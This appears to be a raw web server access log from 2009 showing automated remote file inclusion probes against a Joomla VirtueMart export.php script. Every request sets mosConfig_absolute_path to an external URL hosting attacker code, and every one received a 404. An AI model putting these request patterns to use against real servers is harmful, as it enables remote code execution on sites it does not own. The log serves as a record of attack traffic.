66.11.230.36 - - [05/Jul/2009:07:59:50 -0700] "GET /logs/access_090619.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:59 -0700] "GET /logs/access_090510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:59 -0700] "GET /logs/access_090619.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:00:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:00:05 -0700] "GET /logs/access_090510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:00:05 -0700] "GET /logs/access_090619.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.245.138.143 - - [05/Jul/2009:08:00:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
